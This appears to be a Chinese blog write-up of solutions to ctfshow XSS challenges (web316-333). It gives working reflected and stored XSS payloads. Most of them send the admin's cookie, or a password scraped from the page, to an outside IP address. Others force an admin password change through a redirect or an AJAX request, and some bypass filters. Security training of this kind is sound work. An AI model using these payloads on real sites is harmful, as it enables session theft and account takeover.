【Web】Ctfshow XSS刷题记录

目录

反射型XSS

①web316

②web317-319

③web320-322

④web323-326

存储型XSS

①web327

②web328

③web329

④web330

⑤web331

⑥web332-333


反射型XSS

①web316

直接输入<script>alert(1)</script>,能弹窗。xss题目一般会有个bot,可以触发你的xss代码。如果直接获取cookie只能拿到自己的,这里提示要拿到admin的。

payload:

复制代码
<script>window.open("http://124.222.136.33:1337/"+document.cookie)</script>

②web317-319

script被过滤了,无法弹出1,此时换标签进行尝试

payload:

复制代码
<body onload="window.open('http://124.222.136.33:1337/'+document.cookie)"></body>

③web320-322

过滤了空格,用/**/来替代

payload:

复制代码
<body/**/onload="window.open('http://124.222.136.33:1337/'+document.cookie)"></body>

④web323-326

过滤了iframe

payload:

复制代码
<body/**/onload="window.open('http://124.222.136.33:1337/'+document.cookie)"></body>

存储型XSS

①web327

payload:

复制代码
<body/**/onload="window.open('http://124.222.136.33:1337/'+document.cookie)"></body>

②web328

payload:

复制代码
<script>window.open("http://124.222.136.33:1337/"+document.cookie)</script>

管理员才能查看用户名和密码,如果我们在注册的时候写入xss的payload,就会在用户管理界面执行我们的xss代码,从而获得admin的payload

拿到admin的cookie

改一下cookie看到flag

③web329

这里的是管理员在点击过js后立马登出,它的cookie一直是无效的,我们这里获取的话可以去获取它的用户名和密码

密码在layui-table-cell laytable-cell-1-0-1类中,可以用getElementsByClassName来获取

payload:

复制代码
<script>window.open('http://124.222.136.33:1337/'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>

④web330

发现多了一个修改密码的界面

先自己随便注册登陆再修改密码抓包看看

确定payload:

复制代码
<script>window.location.href='http://127.0.0.1/api/change.php?p=admin';</script>

直接用admin admin登录,下面就可以为所欲为了

⑤web331

修改密码抓个包发现是以post方法提交

这里用Ajax提交post请求

payload:

复制代码
<script>$.ajax({url:'api/change.php',type:'post',data:{p:'admin'}});</script>

用admin admin登录即可

⑥web332-333

这俩题是支付逻辑漏洞,这里不多赘述

相关推荐
小桥风满袖4 分钟前
极简三分钟ES6 - ES8中对象扩展
前端·javascript
内心如初6 分钟前
应急响应事件处理(网络安全体系架构与应急响应的前置知识)
安全·web安全
代码的余温15 分钟前
Web服务器VS应用服务器:核心差异解析
运维·服务器·前端
一涯20 分钟前
日常小常识记录
前端
那一抹阳光多灿烂26 分钟前
CSS 编码规范
前端·css
degree52027 分钟前
CSS :has() 选择器详解:为什么它是“父选择器”?如何实现真正的容器查询?
前端·css·css3
૮・ﻌ・29 分钟前
CSS高级技巧---精灵图、字体图标、布局技巧
前端·css
昔人'30 分钟前
纯`css`固定标题并在滚动时为其添加动画
前端·css
超人不会飛31 分钟前
Vue markdown组件 | 流式 | 大模型应用
前端·javascript·github
Teamhelper_AR32 分钟前
AR眼镜:化工安全生产的技术革命
安全·ar